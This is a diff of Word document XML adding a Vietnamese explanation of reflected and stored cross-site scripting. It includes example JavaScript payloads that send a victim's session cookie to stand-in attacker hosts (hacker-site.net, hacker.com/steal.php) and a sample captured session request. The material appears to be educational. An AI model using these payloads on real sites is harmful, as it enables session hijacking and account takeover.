+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Giả sử </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>victimsite.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>là website nạn nhân truy cập, hacker-site.net là trang của hacker tạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o ra. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nạn nhân truy cập đế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n URL trên sau đó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Server phản hồi cho nạn nhân, kèm với dữ liệu có trong request (đoạn javascript củ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a hacker) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Trình duyệt nạn nhân nhận phản hồi và thực thi đoạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n javascript. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Đoạn javascript mà hacker tạo ra thực tế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> như sau:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số là cookie người dùng:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Host là </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hacker-site.net</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. Đến lúc này, hacker có thể giả mạo với tư cách nạn nhân và thực hiện mọi quyền trên website mà nạn nhân có.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Stored XSS (XSS được lưu trữ)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Đây là dạng nguy hiểm nhất vì mã độc được lưu trữ vĩnh viễn (hoặc bán vĩnh viễn) trên máy chủ, thường là trong cơ sở dữ liệu. Mọi người dùng truy cập vào trang chứa nội dung đó đều sẽ bị ảnh hưởng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Cơ chế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dựa trên m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ã độc được lưu trữ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ẻ tấn công </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">đến </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lưu trữ ở </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> chủ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> đến</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> máy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n nhân. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Kẻ tấn công chèn mã độc vào các trường nhập liệu có tính chất lưu trữ như bình luận, bài viết diễn đàn, hoặc hồ sơ ngườ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i dùng. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Ví dụ Payload (Chèn vào form bình luậ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n):</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="715" w:type="dxa"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="7496"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7496" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="800000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>new</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="267F99"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>Image</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>().</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="001080"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>src</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="A31515"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>"https://hacker.com/steal.php?cookie="</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>+</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="001080"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>document</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="001080"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>cookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="800000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1224"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Mã này sẽ cố gắng gửi cookie phiên của nạn nhân đến máy chủ của kẻ tấn công (hacker.com).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Khác với Reflected tấn công trực tiếp vào một số nạn nhân mà hacker nhắm đến, Stored XSS hướng đến nhiều nạn nhân hơn. Lỗi này xảy ra khi ứng dụng web không kiểm tra kỹ các dữ liệu đầu vào trước khi lưu vào cơ sở dữ liệu (ở đây tôi dùng khái niệm này để chỉ database, file hay những khu vực khác nhằm lưu trữ dữ liệu của ứng dụng web). Ví dụ như các form góp ý, các comment … trên các trang web. Với kỹ thuật Stored XSS , hacker không khai thác trực tiếp mà phải thực hiện tối thiểu qua 2 bướ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>c.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Đầu tiên hacker sẽ thông qua các điểm đầu vào (form, input, textarea…) không được kiểm tra kỹ để chèn vào CSDL các đoạn mã nguy hiểm.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
